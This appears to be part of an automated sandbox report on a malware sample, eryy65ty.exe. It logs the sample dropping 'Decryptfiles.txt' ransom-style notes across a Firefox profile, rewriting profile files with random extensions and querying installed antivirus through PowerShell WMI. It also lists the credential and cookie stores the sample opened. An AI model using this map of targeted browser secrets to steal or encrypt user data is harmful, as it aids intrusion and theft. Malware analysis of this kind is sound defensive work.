Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\parent.lock.lbOMJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal.haLZJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\a2d29e6c-ac08-481c-a5a2-3b45379df53aJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\search.json.mozlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\d1a7a52e-e3c7-4e69-93b1-055dbe542ec9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.MSIkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.EHaOJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.jFCZJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.UnTEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.fYknJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.MLloJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-wal.BQdXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.json.QawrJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966540.1912e5a9-a49a-44a5-95c6-6e047a7410c8.new-profile.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\008ede48-c825-4f89-a2a2-325df2c42c07Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\bc3a7ef5-b3fe-4d70-bd89-e3ab232ffcdbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\a2d29e6c-ac08-481c-a5a2-3b45379df53aJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\36538aaa-6959-4075-90b3-e0189a8af344Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\5fde80e9-4710-4773-9d91-3de50eb3a611Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3c7a728e-a155-4cc6-a293-522ff9409223Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971707.a2d29e6c-ac08-481c-a5a2-3b45379df53a.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\d5ff5767-2951-4d26-a577-46b75b9fa89cJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4dJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.binJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.b5870d07-97bf-4bf9-a21f-d4715e2d8984.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1d907579-3a41-4eb0-8f60-3efb8736231dJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1864fd66-67cd-4e70-8503-03455dd087efJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\e55a0594-28e6-48b8-887a-84c346ad1268Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\8e0ea440-692c-4546-bda1-eee741f68cacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\eventsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\d1a7a52e-e3c7-4e69-93b1-055dbe542ec9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
